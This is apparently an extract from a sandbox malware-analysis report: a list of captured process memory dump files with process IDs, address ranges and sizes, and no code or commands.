memory/4312-153-0x0000000077560000-0x00000000776EE000-memory.dmpFilesize
1.6MB
-
memory/4312-152-0x0000000077560000-0x00000000776EE000-memory.dmpFilesize
1.6MB
-
memory/4312-151-0x0000000077560000-0x00000000776EE000-memory.dmpFilesize
1.6MB
-
memory/4312-148-0x0000000077560000-0x00000000776EE000-memory.dmpFilesize
1.6MB
-
memory/4312-147-0x0000000077560000-0x00000000776EE000-memory.dmpFilesize
1.6MB
-
memory/4312-146-0x0000000077560000-0x00000000776EE000-memory.dmpFilesize
1.6MB
-
memory/4312-145-0x0000000077560000-0x00000000776EE000-memory.dmpFilesize
1.6MB
-
memory/4312-143-0x0000000077560000-0x00000000776EE000-memory.dmpFilesize
1.6MB
-
memory/4312-142-0x0000000077560000-0x00000000776EE000-memory.dmpFilesize
1.6MB
-
memory/4312-141-0x0000000077560000-0x00000000776EE000-memory.dmpFilesize
1.6MB
-
memory/4312-140-0x0000000077560000-0x00000000776EE000-memory.dmpFilesize
1.6MB
-
memory/4312-139-0x0000000077560000-0x00000000776EE000-memory.dmpFilesize
1.6MB
-
memory/4312-135-0x0000000000000000-mapping.dmp
-
memory/4312-138-0x00000000000D0000-0x000000000043E000-memory.dmpFilesize
3.4MB
-
memory/4312-137-0x0000000077560000-0x00000000776EE000-memory.dmpFilesize
1.6MB
-
memory/4472-756-0x0000000000000000-mapping.dmp
-
memory/4564-730-0x0000000000000000-mapping.dmp
-
memory/4628-732-0x0000000000000000-mapping.dmp
-
memory/4704-252-0x0000000000000000-mapping.dmp
-
memory/4712-742-0x0000000000000000-mapping.dmp
-
memory/4728-246-0x0000000000000000-mapping.dmp
-
memory/4788-737-0x0000000000000000-mapping.dmp
-
memory/4912-256-0x0000000000000000-mapping.dmp
-
memory/4940-257-0x0000000000000000-mapping.dmp
-
memory/4992-254-0x0000000000000000-mapping.dmp
-
memory/5016-419-0x0000000000000000-mapping.dmp
-
memory/5028-244-0x0000000000000000-mapping.dmp
-
memory/5048-259-0x0000000000000000-mapping.dmp
-
memory/5052-270-0x0000000000000000-mapping.dmp
-
memory/5084-753-0x0000000000000000-mapping.dmp
-
memory/5108-260-0x0000000000000000-mapping.dmp
-
memory/5184-1064-0x00000000009C0000-0x0000000000D2E000-memory.dmpFilesize
3.4MB
-
memory/5184-1052-0x00000000009C0000-0x0000000000D2E000-memory.dmpFilesize
3.4MB
-
memory/5184-1086-0x00000000009C0000-0x0000000000D2E000-memory.dmpFilesize
3.4MB
-
memory/5184-1085-0x00000000009C0000-0x0000000000D2E000-memory.dmpFilesize
3.4MB
-
memory/5520-1071-0x00007FF7C1F214E0-mapping.dmp
-
memory/5532-1074-0x0000000000000000-mapping.dmp
-
memory/5580-1076-0x0000000000000000-mapping.dmp
-
memory/5616-1077-0x0000000000000000-mapping.dmp
-
memory/5680-1084-0x00007FF679F20000-0x00007FF67A714000-memory.dmpFilesize
8.0MB
-
memory/5680-1087-0x00007FF679F20000-0x00007FF67A714000-memory.dmpFilesize
8.0MB
-
memory/5680-1080-0x00007FF67A7125D0-mapping.dmp
-
memory/92544-578-0x0000000000000000-mapping.dmp
-
memory/92544-635-0x0000019F26610000-0x0000019F2661A000-memory.dmpFilesize
40KB
-
memory/92544-602-0x0000019F26800000-0x0000019F268B9000-memory.dmpFilesize
740KB
-
memory/92544-596-0x0000019F26620000-0x0000019F2663C000-memory.dmpFilesize
112KB
-
memory/92988-517-0x0000000000408597-mapping.dmp